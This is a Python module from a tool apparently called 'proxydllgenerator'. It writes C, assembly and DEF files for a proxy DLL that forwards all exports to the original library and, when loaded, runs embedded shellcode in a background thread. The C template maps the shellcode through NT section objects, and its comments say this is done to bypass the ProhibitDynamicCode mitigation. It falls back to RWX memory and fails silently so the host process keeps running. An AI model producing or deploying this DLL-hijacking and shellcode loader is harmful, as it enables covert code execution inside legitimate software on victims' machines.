"""Generate the proxy DLL C source, assembly stubs, and DEF file."""

from __future__ import annotations

import os
import re

from .dll_parser import DllInfo, ExportEntry

_BYTES_PER_LINE = 12


def _format_shellcode(data: bytes) -> str:
    lines: list[str] = []
    for i in range(0, len(data), _BYTES_PER_LINE):
        chunk = data[i : i + _BYTES_PER_LINE]
        lines.append("    " + ", ".join(f"0x{b:02x}" for b in chunk))
    return ",\n".join(lines)


def _is_valid_c_identifier(name: str) -> bool:
    return bool(re.match(r"^[A-Za-z_][A-Za-z0-9_]*$", name))


# ---------------------------------------------------------------------------
# C source  (no inline asm – just DllMain + shellcode thread)
# ---------------------------------------------------------------------------

_C_TEMPLATE = """\
/*
 * Proxy DLL – auto-generated by proxydllgenerator
 * Original : {orig_name}.dll | Arch: {arch}
 */
#include <windows.h>

typedef NTSTATUS (NTAPI *_NtCreateSection_t)(
    PHANDLE, ACCESS_MASK, PVOID, PLARGE_INTEGER, ULONG, ULONG, HANDLE);
typedef NTSTATUS (NTAPI *_NtMapViewOfSection_t)(
    HANDLE, HANDLE, PVOID *, ULONG_PTR, SIZE_T, PLARGE_INTEGER,
    PSIZE_T, DWORD, ULONG, ULONG);
typedef NTSTATUS (NTAPI *_NtUnmapViewOfSection_t)(HANDLE, PVOID);
typedef NTSTATUS (NTAPI *_NtClose_t)(HANDLE);

/* shellcode */
static const unsigned char _sc[] = {{
{shellcode_bytes}
}};

/*
 * proxy_fns – global pointer array defined in stubs.s.
 * DllMain fills every slot; the asm stubs JMP through it.
 */
extern void *proxy_fns[];

/*
 * exec_via_section – execute shellcode by mapping a section object.
 * Section-backed executable memory is not subject to ProcessDynamicCodePolicy
 * (ProhibitDynamicCode) the way VirtualAlloc PAGE_EXECUTE_READWRITE is.
 * Returns TRUE on success.
 */
static BOOL _exec_via_section(void)
{{
    HMODULE hNt = GetModuleHandleA("ntdll.dll");
    if (!hNt) return FALSE;

    _NtCreateSection_t      pNtCreateSection      =
        (_NtCreateSection_t)     GetProcAddress(hNt, "NtCreateSection");
    _NtMapViewOfSection_t   pNtMapViewOfSection   =
        (_NtMapViewOfSection_t)  GetProcAddress(hNt, "NtMapViewOfSection");
    _NtUnmapViewOfSection_t pNtUnmapViewOfSection =
        (_NtUnmapViewOfSection_t)GetProcAddress(hNt, "NtUnmapViewOfSection");
    _NtClose_t              pNtClose              =
        (_NtClose_t)             GetProcAddress(hNt, "NtClose");

    if (!pNtCreateSection || !pNtMapViewOfSection ||
        !pNtUnmapViewOfSection || !pNtClose)
        return FALSE;

    LARGE_INTEGER sz;
    sz.QuadPart = (LONGLONG)sizeof(_sc);

    HANDLE hSection = NULL;
    /* SEC_COMMIT | PAGE_EXECUTE_READWRITE */
    NTSTATUS st = pNtCreateSection(&hSection, SECTION_ALL_ACCESS, NULL,
                                   &sz, PAGE_EXECUTE_READWRITE, 0x8000000, NULL);
    if (st != 0 || !hSection) return FALSE;

    /* Map a RW view to copy shellcode in */
    PVOID  rwView  = NULL;
    SIZE_T viewSz  = 0;
    st = pNtMapViewOfSection(hSection, GetCurrentProcess(),
                             &rwView, 0, 0, NULL, &viewSz,
                             2 /* ViewUnmap */, 0, PAGE_READWRITE);
    if (st != 0) {{ pNtClose(hSection); return FALSE; }}

    for (SIZE_T i = 0; i < sizeof(_sc); i++)
        ((unsigned char *)rwView)[i] = _sc[i];

    pNtUnmapViewOfSection(GetCurrentProcess(), rwView);

    /* Map a separate RX view to execute from */
    PVOID  rxView  = NULL;
    SIZE_T rxSz    = 0;
    st = pNtMapViewOfSection(hSection, GetCurrentProcess(),
                             &rxView, 0, 0, NULL, &rxSz,
                             2 /* ViewUnmap */, 0, PAGE_EXECUTE_READ);
    pNtClose(hSection);
    if (st != 0) return FALSE;

    ((void (*)(void))rxView)();
    pNtUnmapViewOfSection(GetCurrentProcess(), rxView);
    return TRUE;
}}

/* shellcode execution thread */
static DWORD WINAPI _ScThread(LPVOID p)
{{
    (void)p;

    /* Primary path: section-mapped memory (bypasses ProhibitDynamicCode) */
    if (_exec_via_section()) return 0;

    /* Fallback: classic VirtualAlloc RWX – wrapped in SEH so a policy
       violation (STATUS_DYNAMIC_CODE_BLOCKED / 0xC0000906) does not
       propagate as an unhandled exception and crash the host process. */
    __try {{
        LPVOID m = VirtualAlloc(NULL, sizeof(_sc),
                                MEM_COMMIT | MEM_RESERVE,
                                PAGE_EXECUTE_READWRITE);
        if (!m) return 1;
        for (SIZE_T i = 0; i < sizeof(_sc); i++)
            ((unsigned char *)m)[i] = _sc[i];
        ((void (*)(void))m)();
        VirtualFree(m, 0, MEM_RELEASE);
    }}
    __except(EXCEPTION_EXECUTE_HANDLER) {{
        /* blocked by policy – fail silently so the host process survives */
    }}
    return 0;
}}

BOOL WINAPI DllMain(HINSTANCE h, DWORD reason, LPVOID reserved)
{{
    (void)reserved;
    if (reason == DLL_PROCESS_ATTACH) {{
        DisableThreadLibraryCalls(h);

        /* 1st try: renamed original in the same directory (standard deployment) */
        HMODULE orig = LoadLibraryA("{orig_name}.dll");
        if (!orig) {{
            /* 2nd try: real DLL from System32 – lets the proxy work even when
               the renamed original hasn't been placed yet (system DLLs only) */
            char _sysdir[MAX_PATH];
            if (GetSystemDirectoryA(_sysdir, MAX_PATH)) {{
                lstrcatA(_sysdir, "\\\\{dll_basename}.dll");
                orig = LoadLibraryA(_sysdir);
            }}
        }}
        if (!orig) return FALSE;

{getproc_calls}

        CloseHandle(CreateThread(NULL, 0, _ScThread, NULL, 0, NULL));
    }}
    return TRUE;
}}
"""


# ---------------------------------------------------------------------------
# Assembly stub templates
# ---------------------------------------------------------------------------

# x64 – symbol names have NO leading underscore on Win64 ABI
_ASM_HEADER_X64 = """\
/* proxy stubs – auto-generated by proxydllgenerator (x64) */

    .data
    .globl proxy_fns
proxy_fns:
{ptr_slots}

    .text
"""

_ASM_STUB_X64 = """\
    .globl {sym}
    .def {sym}; .scl 2; .type 32; .endef
{sym}:
    jmpq *proxy_fns+{offset}(%rip)
"""

# x86 – Win32 ABI prepends '_' to every C symbol; we define _name directly
_ASM_HEADER_X86 = """\
/* proxy stubs – auto-generated by proxydllgenerator (x86) */

    .data
    .globl _proxy_fns
_proxy_fns:
{ptr_slots}

    .text
"""

_ASM_STUB_X86 = """\
    .globl _{sym}
    .def _{sym}; .scl 2; .type 32; .endef
_{sym}:
    jmp *_proxy_fns+{offset}
"""


# ---------------------------------------------------------------------------
# Generation helpers
# ---------------------------------------------------------------------------

def _sanitize(name: str, ordinal: int) -> str:
    """Return a safe C/asm identifier for an export name."""
    if _is_valid_c_identifier(name):
        return name
    safe = re.sub(r"[^A-Za-z0-9_]", "_", name)
    if safe[0].isdigit():
        safe = "_" + safe
    return safe or f"stub_ord{ordinal}"


def generate_proxy_source(
    shellcode_path: str,
    orig_name: str,
    dll_basename: str,
    arch: str,
    exports: list[ExportEntry],
) -> tuple[str, str, list[tuple[str, str, int]]]:
    """
    Generate C source and assembly stubs for the proxy DLL.

    Returns:
        (c_source, asm_source, valid_exports)
        valid_exports: list of (real_name, safe_asm_name, ordinal)
    """
    with open(shellcode_path, "rb") as fh:
        sc_data = fh.read()
    if not sc_data:
        raise ValueError(f"Shellcode file is empty: {shellcode_path}")

    ptr_size   = 8 if arch == "x64" else 4
    asm_header = _ASM_HEADER_X64 if arch == "x64" else _ASM_HEADER_X86
    asm_stub   = _ASM_STUB_X64   if arch == "x64" else _ASM_STUB_X86
    ptr_decl   = ".quad 0" if arch == "x64" else ".long 0"

    valid_exports: list[tuple[str, str, int]] = []

    for exp in exports:
        if exp.name is None:
            continue
        safe = _sanitize(exp.name, exp.ordinal)
        valid_exports.append((exp.name, safe, exp.ordinal))

    # ---- build assembly ----
    ptr_slots  = "\n".join(
        f"    {ptr_decl}    /* [{i}] {real} */"
        for i, (real, safe, _) in enumerate(valid_exports)
    )

    asm_stubs = "".join(
        asm_stub.format(sym=safe, offset=i * ptr_size)
        for i, (_, safe, _) in enumerate(valid_exports)
    )

    asm_src = asm_header.format(ptr_slots=ptr_slots) + asm_stubs

    # ---- build C source ----
    getproc_calls = "\n".join(
        f'        proxy_fns[{i}] = (void *)GetProcAddress(orig, "{real}");'
        for i, (real, safe, _) in enumerate(valid_exports)
    )

    c_src = _C_TEMPLATE.format(
        orig_name=orig_name,
        dll_basename=dll_basename,
        arch=arch,
        shellcode_bytes=_format_shellcode(sc_data),
        getproc_calls=getproc_calls,
    )

    return c_src, asm_src, valid_exports


# ---------------------------------------------------------------------------
# DEF file – ordinal assignment only
# ---------------------------------------------------------------------------

def generate_def_file(
    proxy_name: str,
    valid_exports: list[tuple[str, str, int]],
) -> str:
    """
    DEF file that assigns ordinals to each export.
    No forwarder entries – the asm stubs are the real implementations.
    """
    lines = [
        "; Proxy DEF – auto-generated by proxydllgenerator",
        "",
        f"LIBRARY {proxy_name}",
        "EXPORTS",
    ]
    for real_name, safe_name, ordinal in valid_exports:
        if real_name == safe_name:
            lines.append(f"    {safe_name} @{ordinal}")
        else:
            # Map the asm symbol to the original export name
            lines.append(f"    {real_name}={safe_name} @{ordinal}")
    return "\n".join(lines) + "\n"


# ---------------------------------------------------------------------------
# Write all generated files to disk
# ---------------------------------------------------------------------------

def write_build_files(
    build_dir: str,
    proxy_name: str,
    orig_name: str,
    dll_info: DllInfo,
    shellcode_path: str,
    arch: str,
) -> tuple[str, str, str, int]:
    """
    Write dllmain.c, stubs.s, and proxy.def into build_dir.

    Returns:
        (c_path, asm_path, def_path, skipped_count)
    """
    os.makedirs(build_dir, exist_ok=True)

    c_src, asm_src, valid_exports = generate_proxy_source(
        shellcode_path=shellcode_path,
        orig_name=orig_name,
        dll_basename=dll_info.basename,
        arch=arch,
        exports=dll_info.exports,
    )

    skipped = sum(1 for e in dll_info.exports if e.name is None)
    def_src = generate_def_file(proxy_name, valid_exports)

    c_path   = os.path.join(build_dir, "dllmain.c")
    asm_path = os.path.join(build_dir, "stubs.s")
    def_path = os.path.join(build_dir, "proxy.def")

    with open(c_path,   "w", encoding="utf-8") as fh: fh.write(c_src)
    with open(asm_path, "w", encoding="utf-8") as fh: fh.write(asm_src)
    with open(def_path, "w", encoding="utf-8") as fh: fh.write(def_src)

    return c_path, asm_path, def_path, skipped
